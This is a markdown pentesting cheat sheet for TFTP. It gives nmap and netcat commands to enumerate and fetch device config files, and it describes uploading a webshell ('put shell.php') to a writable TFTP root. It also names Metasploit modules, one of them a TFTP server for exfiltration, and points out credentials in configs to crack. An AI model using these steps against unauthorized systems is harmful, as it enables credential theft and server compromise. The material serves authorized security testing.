Skip to content

Latest commit

 

History

History
166 lines (119 loc) · 2.46 KB

File metadata and controls

166 lines (119 loc) · 2.46 KB

TFTP Pentesting

Port: UDP 69

TFTP (Trivial File Transfer Protocol) is a simple file transfer protocol with no authentication. Often used for network device configs, PXE boot, etc.


Discovery

# UDP scan
nmap -sU -p 69 $ip

# Service version
nmap -sU -p 69 -sV $ip

Enumeration with Nmap Scripts

File Enumeration

# Enumerate common files (default wordlist)
nmap -sU -p 69 --script=tftp-enum $ip

Output:

69/udp open  tftp
| tftp-enum: 
|_  ciscortr.cfg

Version Detection

nmap -sU -p 69 --script=tftp-version $ip

Custom Wordlist

nmap -sU -p 69 --script=tftp-enum --script-args tftp-enum.filelist=/path/to/wordlist.txt $ip

Common Files to Check

# Network devices
ciscortr.cfg
running-config
startup-config
router.cfg
switch.cfg

# Boot files
pxelinux.0
pxelinux.cfg/default
boot.cfg

# Other
test.txt
config.txt
backup.cfg

Manual Interaction

TFTP Client

# Connect and get file
tftp $ip -c get filename.cfg

# Interactive mode
tftp $ip
tftp> get ciscortr.cfg
tftp> quit

Netcat (Raw)

# Read request (opcode 01)
echo -e "\x00\x01filename\x00octet\x00" | nc -u $ip 69

# Test with timeout
timeout 2 bash -c "echo -e '\x00\x01test.txt\x00octet\x00' | nc -u $ip 69" | xxd

TFTP Opcodes

Opcode Operation
01 Read Request (RRQ)
02 Write Request (WRQ)
03 Data
04 Acknowledgment
05 Error

File Upload (If Writable)

# Upload file
tftp $ip -c put localfile.txt remotefile.txt

# Interactive
tftp $ip
tftp> put shell.php

Exploitation

If TFTP is writable and serves web directory:

  1. Upload webshell
  2. Access via HTTP

Metasploit

# TFTP enumeration
use auxiliary/scanner/tftp/tftpbrute
set RHOSTS $ip
run

# TFTP server (for exfil)
use auxiliary/server/tftp
set TFTPROOT /tmp
run

Config File Analysis

Network device configs often contain:

  • Usernames/passwords (sometimes plaintext or Type 7)
  • SNMP community strings
  • VPN pre-shared keys
  • Network topology info
  • Domain names/hostnames

Cisco Password Cracking

See Hashcat - Network Device Hashes for Cisco Type 5/7/8/9 cracking.


Common TFTP Software

Software Notes
atftpd Linux, common
tftpd-hpa Linux
Netkit tftpd Linux
SolarWinds TFTP Windows
Cisco TFTP Network devices